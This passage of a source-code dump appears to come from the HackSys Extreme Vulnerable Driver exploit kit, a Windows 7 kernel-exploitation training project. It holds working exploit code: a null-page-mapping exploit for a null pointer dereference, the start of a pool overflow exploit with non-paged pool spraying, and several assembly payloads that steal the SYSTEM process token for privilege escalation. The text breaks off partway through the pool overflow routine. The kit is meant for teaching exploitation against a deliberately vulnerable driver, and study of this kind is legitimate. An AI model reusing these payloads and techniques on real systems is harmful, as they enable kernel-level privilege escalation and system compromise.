34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | IntegerOverflow.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Integer Overflow Vulnerability implemented
47 | in HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __INTEGER_OVERFLOW_H__
52 | #define __INTEGER_OVERFLOW_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
58 | #define RET_OVERWRITE_INTEGER 11
59 | #define BUFFER_TERMINATOR 1
60 |
61 | DWORD WINAPI IntegerOverflowThread(LPVOID Parameter);
62 |
63 | #endif //__INTEGER_OVERFLOW_H__
64 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/NullPointerDereference.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | NullPointerDereference.c
43 |
44 | Abstract:
45 | This module implements the exploit for Null Pointer
46 | Dereference Vulnerability implemented in HackSys Extreme
47 | Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #include "NullPointerDereference.h"
52 |
53 | DWORD WINAPI NullPointerDereferenceThread(LPVOID Parameter) {
54 | HANDLE hFile = NULL;
55 | ULONG BytesReturned;
56 | ULONG MagicValue = 0xBAADF00D;
57 | PVOID NullPointerPlus4 = NULL;
58 | PVOID NullPageBaseAddress = NULL;
59 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
60 | PVOID EopPayload = &TokenStealingPayloadWin7Generic;
61 |
62 | __try {
63 | DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");
64 |
65 | if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
66 | DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
67 | }
68 | else {
69 | DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
70 | }
71 |
72 | // Get the device handle
73 | DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
74 | DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);
75 |
76 | hFile = GetDeviceHandle(FileName);
77 |
78 | if (hFile == INVALID_HANDLE_VALUE) {
79 | DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
80 | exit(EXIT_FAILURE);
81 | }
82 | else {
83 | DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
84 | }
85 |
86 | DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
87 |
88 | DEBUG_INFO("\t\t[+] Mapping Null Page\n");
89 |
90 | if (!MapNullPage()) {
91 | DEBUG_ERROR("\t\t[-] Failed Mapping Null Page: 0x%X\n", GetLastError());
92 | exit(EXIT_FAILURE);
93 | }
94 |
95 | DEBUG_INFO("\t\t[+] Preparing Null Page Memory Layout\n");
96 |
97 | NullPointerPlus4 = (PVOID)((ULONG)NullPageBaseAddress + 0x4);
98 |
99 | // Now set the function pointer
100 | *(PULONG)NullPointerPlus4 = (ULONG)EopPayload;
101 |
102 | DEBUG_INFO("\t\t\t[+] NullPage+0x4 Value: 0x%p\n", *(PULONG)NullPointerPlus4);
103 | DEBUG_INFO("\t\t\t[+] NullPage+0x4 Address: 0x%p\n", NullPointerPlus4);
104 |
105 | DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
106 |
107 | DEBUG_MESSAGE("\t[+] Triggering Null Pointer Dereference\n");
108 |
109 | OutputDebugString("****************Kernel Mode****************\n");
110 |
111 | DeviceIoControl(hFile,
112 | HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE,
113 | (LPVOID)&MagicValue,
114 | 0,
115 | NULL,
116 | 0,
117 | &BytesReturned,
118 | NULL);
119 |
120 | OutputDebugString("****************Kernel Mode****************\n");
121 | }
122 | __except (EXCEPTION_EXECUTE_HANDLER) {
123 | DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
124 | exit(EXIT_FAILURE);
125 | }
126 |
127 | return EXIT_SUCCESS;
128 | }
129 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/NullPointerDereference.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | NullPointerDereference.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Null Pointer Dereference Vulnerability
47 | implemented in HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __NULL_POINTER_DEREFERENCE_H__
52 | #define __NULL_POINTER_DEREFERENCE_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
58 | DWORD WINAPI NullPointerDereferenceThread(LPVOID Parameter);
59 |
60 | #endif //__NULL_POINTER_DEREFERENCE_H__
61 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Payloads.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | Payloads.c
43 |
44 | Abstract:
45 | This module implements the EoP payload used for privilege
46 | escalation after gaining control of the instruction pointer
47 | in kernel.
48 |
49 | Test Bed:
50 | These payloads have been tested on Windows 7 SP1 x86
51 |
52 | TODO:
53 | 1. Add a better version of the EoP payload, basically DuplicateToken()
54 | stuff.
55 | 2. Try to have a universal payload and add a better way to do Kernel
56 | Recovery.
57 |
58 | --*/
59 |
60 | #include "Payloads.h"
61 |
62 | #pragma warning(push)
63 | #pragma warning(disable: 4731)
64 |
65 | VOID TokenStealingPayloadWin7() {
66 | // Importance of Kernel Recovery
67 | __asm {
68 | pushad ; Save registers state
69 |
70 | ; Start of Token Stealing Stub
71 | xor eax, eax ; Set ZERO
72 | mov eax, fs:[eax + KTHREAD_OFFSET] ; Get nt!_KPCR.PcrbData.CurrentThread
73 | ; _KTHREAD is located at FS:[0x124]
74 |
75 | mov eax, [eax + EPROCESS_OFFSET] ; Get nt!_KTHREAD.ApcState.Process
76 |
77 | mov ecx, eax ; Copy current process _EPROCESS structure
78 |
79 | mov edx, SYSTEM_PID ; WIN 7 SP1 SYSTEM process PID = 0x4
80 |
81 | SearchSystemPID:
82 | mov eax, [eax + FLINK_OFFSET] ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
83 | sub eax, FLINK_OFFSET
84 | cmp [eax + PID_OFFSET], edx ; Get nt!_EPROCESS.UniqueProcessId
85 | jne SearchSystemPID
86 |
87 | mov edx, [eax + TOKEN_OFFSET] ; Get SYSTEM process nt!_EPROCESS.Token
88 | mov [ecx + TOKEN_OFFSET], edx ; Replace target process nt!_EPROCESS.Token
89 | ; with SYSTEM process nt!_EPROCESS.Token
90 | ; End of Token Stealing Stub
91 |
92 | popad ; Restore registers state
93 |
94 | ; Kernel Recovery Stub
95 | xor eax, eax ; Set NTSTATUS SUCCEESS
96 | add esp, 12 ; Fix the stack
97 | pop ebp ; Restore saved EBP
98 | ret 8 ; Return cleanly
99 | }
100 | }
101 |
102 | VOID TokenStealingPayladGSWin7() {
103 | // Importance of Kernel Recovery
104 | __asm {
105 | pushad ; Save registers state
106 |
107 | ; Start of Token Stealing Stub
108 | xor eax, eax ; Set ZERO
109 | mov eax, fs:[eax + KTHREAD_OFFSET] ; Get nt!_KPCR.PcrbData.CurrentThread
110 | ; _KTHREAD is located at FS:[0x124]
111 |
112 | mov eax, [eax + EPROCESS_OFFSET] ; Get nt!_KTHREAD.ApcState.Process
113 |
114 | mov ecx, eax ; Copy current process _EPROCESS structure
115 |
116 | mov edx, SYSTEM_PID ; WIN 7 SP1 SYSTEM process PID = 0x4
117 |
118 | SearchSystemPID:
119 | mov eax, [eax + FLINK_OFFSET] ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
120 | sub eax, FLINK_OFFSET
121 | cmp [eax + PID_OFFSET], edx ; Get nt!_EPROCESS.UniqueProcessId
122 | jne SearchSystemPID
123 |
124 | mov edx, [eax + TOKEN_OFFSET] ; Get SYSTEM process nt!_EPROCESS.Token
125 | mov [ecx + TOKEN_OFFSET], edx ; Replace target process nt!_EPROCESS.Token
126 | ; with SYSTEM process nt!_EPROCESS.Token
127 | ; End of Token Stealing Stub
128 |
129 | popad ; Restore registers state
130 |
131 | ; Kernel Recovery Stub
132 | add esp, 0x798 ; Offset of IRP on stack
133 | mov edi, [esp] ; Restore the pointer to IRP
134 | add esp, 0x8 ; Offset of DbgPrint string
135 | mov ebx, [esp] ; Restore the DbgPrint string
136 | add esp, 0x234 ; Target frame to return
137 | xor eax, eax ; Set NTSTATUS SUCCEESS
138 | pop ebp ; Restore saved EBP
139 | ret 8 ; Return cleanly
140 | }
141 | }
142 |
143 | #pragma warning(pop)
144 |
145 | VOID TokenStealingPayloadWin7Generic() {
146 | // No Need of Kernel Recovery as we are not corrupting anything
147 | __asm {
148 | pushad ; Save registers state
149 |
150 | ; Start of Token Stealing Stub
151 | xor eax, eax ; Set ZERO
152 | mov eax, fs:[eax + KTHREAD_OFFSET] ; Get nt!_KPCR.PcrbData.CurrentThread
153 | ; _KTHREAD is located at FS:[0x124]
154 |
155 | mov eax, [eax + EPROCESS_OFFSET] ; Get nt!_KTHREAD.ApcState.Process
156 |
157 | mov ecx, eax ; Copy current process _EPROCESS structure
158 |
159 | mov edx, SYSTEM_PID ; WIN 7 SP1 SYSTEM process PID = 0x4
160 |
161 | SearchSystemPID:
162 | mov eax, [eax + FLINK_OFFSET] ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
163 | sub eax, FLINK_OFFSET
164 | cmp [eax + PID_OFFSET], edx ; Get nt!_EPROCESS.UniqueProcessId
165 | jne SearchSystemPID
166 |
167 | mov edx, [eax + TOKEN_OFFSET] ; Get SYSTEM process nt!_EPROCESS.Token
168 | mov [ecx + TOKEN_OFFSET], edx ; Replace target process nt!_EPROCESS.Token
169 | ; with SYSTEM process nt!_EPROCESS.Token
170 | ; End of Token Stealing Stub
171 |
172 | popad ; Restore registers state
173 | }
174 | }
175 |
176 | VOID TokenStealingPayloadPoolOverflowWin7() {
177 | __asm {
178 | pushad ; Save registers state
179 |
180 | ; Start of Token Stealing Stub
181 | xor eax, eax ; Set ZERO
182 | mov eax, fs:[eax + KTHREAD_OFFSET] ; Get nt!_KPCR.PcrbData.CurrentThread
183 | ; _KTHREAD is located at FS:[0x124]
184 |
185 | mov eax, [eax + EPROCESS_OFFSET] ; Get nt!_KTHREAD.ApcState.Process
186 |
187 | mov ecx, eax ; Copy current process _EPROCESS structure
188 |
189 | mov edx, SYSTEM_PID ; WIN 7 SP1 SYSTEM process PID = 0x4
190 |
191 | SearchSystemPID:
192 | mov eax, [eax + FLINK_OFFSET] ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
193 | sub eax, FLINK_OFFSET
194 | cmp [eax + PID_OFFSET], edx ; Get nt!_EPROCESS.UniqueProcessId
195 | jne SearchSystemPID
196 |
197 | mov edx, [eax + TOKEN_OFFSET] ; Get SYSTEM process nt!_EPROCESS.Token
198 | mov [ecx + TOKEN_OFFSET], edx ; Replace target process nt!_EPROCESS.Token
199 | ; with SYSTEM process nt!_EPROCESS.Token
200 | ; End of Token Stealing Stub
201 |
202 | popad ; Restore registers state
203 |
204 | ; Kernel Recovery Stub
205 | mov eax, 0x1
206 | }
207 | }
208 |
209 | VOID TokenStealingPayloadDuplicateToken() {
210 | // 1. Get handle to SYSTEM process
211 | // 2. Get the token of SYSTEM process
212 | // 3. Duplicate the token
213 | // 4. Set current process token to new privileged token
214 | // Examples:
215 | // http://j00ru.vexillium.org/?p=1272
216 | // http://www.wasm.ru/forum/viewtopic.php?id=29591
217 | //
218 | HMODULE hModule = NULL;
219 | CLIENT_ID ClientId = { 0 };
220 | HANDLE hSystemProcess = NULL;
221 | PEPROCESS CurrentProcess = NULL;
222 | HANDLE hSystemProcessToken = NULL;
223 | HANDLE hNewPrivilegedToken = NULL;
224 | NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;
225 | PROCESS_ACCESS_TOKEN AccessToken = { 0 };
226 | OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
227 |
228 | ClientId.UniqueProcess = (HANDLE)0x4;
229 |
230 | InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
231 | NtStatus = ZwOpenProcess(&hSystemProcess, GENERIC_ALL, &ObjectAttributes, &ClientId);
232 |
233 | NtStatus = ZwOpenProcessToken(hSystemProcess, GENERIC_ALL, &hSystemProcessToken);
234 |
235 | InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
236 | NtStatus = ZwDuplicateToken(hSystemProcessToken,
237 | TOKEN_ALL_ACCESS,
238 | &ObjectAttributes,
239 | TRUE,
240 | TokenPrimary,
241 | &hNewPrivilegedToken);
242 |
243 | AccessToken.Token = hNewPrivilegedToken;
244 |
245 | // Fix the issue with PrimaryTokenFrozen
246 | CurrentProcess = PsGetCurrentProcess();
247 |
248 | // Now set PrimaryTokenFrozen to NULL
249 | CurrentProcess->PrimaryTokenFrozen = 0;
250 |
251 | NtStatus = ZwSetInformationProcess(GetCurrentProcess(),
252 | ProcessAccessToken,
253 | &AccessToken,
254 | sizeof(AccessToken));
255 |
256 | if (hNewPrivilegedToken) {
257 | ZwClose(hNewPrivilegedToken);
258 | }
259 |
260 | if (hSystemProcessToken) {
261 | ZwClose(hSystemProcessToken);
262 | }
263 |
264 | if (hSystemProcess) {
265 | ZwClose(hSystemProcess);
266 | }
267 | }
268 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Payloads.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | Payloads.h
43 |
44 | Abstract:
45 | This module implements the data structures used by EoP payload.
46 |
47 | --*/
48 |
49 | #ifndef __PAYLOADS_H__
50 | #define __PAYLOADS_H__
51 |
52 | #pragma once
53 |
54 | #include "Common.h"
55 |
56 | // Windows 7 SP1 x86 Offsets
57 | #define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread
58 | #define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process
59 | #define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId
60 | #define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink
61 | #define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token
62 | #define SYSTEM_PID 0x004 // SYSTEM Process PID
63 |
64 | VOID TokenStealingPayloadWin7();
65 | VOID TokenStealingPayladGSWin7();
66 | VOID TokenStealingPayloadWin7Generic();
67 | VOID TokenStealingPayloadDuplicateToken();
68 | VOID TokenStealingPayloadPoolOverflowWin7();
69 |
70 | #endif //__PAYLOADS_H__
71 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/PoolOverflow.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | PoolOverflow.c
43 |
44 | Abstract:
45 | This module implements the exploit for Pool Overflow
46 | Vulnerability implemented in HackSys Extreme Vulnerable
47 | Driver.
48 |
49 | --*/
50 |
51 | #include "PoolOverflow.h"
52 |
53 | VOID SprayNonPagedPoolWithEventObjects() {
54 | UINT32 i = 0;
55 |
56 | RtlFillMemory(EventObjectArrayA, sizeof(EventObjectArrayA), 0x0);
57 | RtlFillMemory(EventObjectArrayB, sizeof(EventObjectArrayB), 0x0);
58 |
59 | for (i = 0; i < 10000; i++) {
60 | EventObjectArrayA[i] = CreateEvent(NULL, FALSE, FALSE, NULL);
61 |
62 | if (!EventObjectArrayA[i]) {
63 | DEBUG_ERROR("\t\t[-] Failed To Allocate Event Objects: 0x%X\n", GetLastError());
64 | exit(EXIT_FAILURE);
65 | }
66 | }
67 |
68 | for (i = 0; i < 5000; i++) {
69 | EventObjectArrayB[i] = CreateEvent(NULL, FALSE, FALSE, NULL);
70 |
71 | if (!EventObjectArrayB[i]) {
72 | DEBUG_ERROR("\t\t[-] Failed To Allocate Event Objects: 0x%X\n", GetLastError());
73 | exit(EXIT_FAILURE);
74 | }
75 | }
76 | }
77 |
78 | VOID CreateHolesInNonPagedPoolByCoalescingEventObjects() {
79 | UINT32 i = 0;
80 | UINT32 j = 0;
81 |
82 | for (i = 0; i < 5000; i += 16) {
83 | for (j = 0; j < 8; j++) {
84 | if (!CloseHandle(EventObjectArrayB[i + j])) {
85 | DEBUG_ERROR("\t\t[-] Failed To Close Event Objects Handle: 0x%X\n", GetLastError());
86 | exit(EXIT_FAILURE);
87 | }
88 | }
89 | }
90 | }
91 |
92 | VOID FreeEventObjects() {
93 | UINT32 i = 0;
94 | UINT32 j = 0;
95 |
96 | for (i = 0; i < 10000; i++) {
97 | if (!CloseHandle(EventObjectArrayA[i])) {
98 | DEBUG_ERROR("\t\t[-] Failed To Close Event Objects Handle: 0x%X\n", GetLastError());
99 | exit(EXIT_FAILURE);
100 | }
101 | }
102 |
103 | for (i = 8; i < 5000; i += 16) {
104 | for (j = 0; j < 8; j++) {
105 | if (!CloseHandle(EventObjectArrayB[i + j])) {
106 | DEBUG_ERROR("\t\t[-] Failed To Close Event Objects Handle: 0x%X\n", GetLastError());
107 | exit(EXIT_FAILURE);
108 | }
109 | }
110 | }
111 | }
112 |
113 | DWORD WINAPI PoolOverflowThread(LPVOID Parameter) {
114 | ULONG BytesReturned;
115 | HANDLE hFile = NULL;
116 | PVOID Memory = NULL;
117 | PULONG UserModeBuffer = NULL;
118 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
119 | PVOID EopPayload = &TokenStealingPayloadPoolOverflowWin7;
120 | SIZE_T UserModeBufferSize = (ULONG)(POOL_BUFFER_SIZE + TYPE_INDEX_OVERWRITE);
121 |
122 | __try {
123 | DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");
124 |
125 | if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
126 | DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
127 | }
128 | else {
129 | DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
130 | }
131 |
132 | // Get the device handle
133 | DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
134 | DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);
135 |
136 | hFile = GetDeviceHandle(FileName);
137 |
138 | if (hFile == INVALID_HANDLE_VALUE) {
139 | DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
140 | exit(EXIT_FAILURE);
141 | }
142 | else {
143 | DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
144 | }
145 |
146 | DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
147 |
148 | DEBUG_INFO("\t\t[+] Allocating Memory For Buffer\n");
149 |
150 | // Allocate the Heap chunk
151 | UserModeBuffer = (PULONG)HeapAlloc(GetProcessHeap(),
152 | HEAP_ZERO_MEMORY,
153 | UserModeBufferSize);
154 |
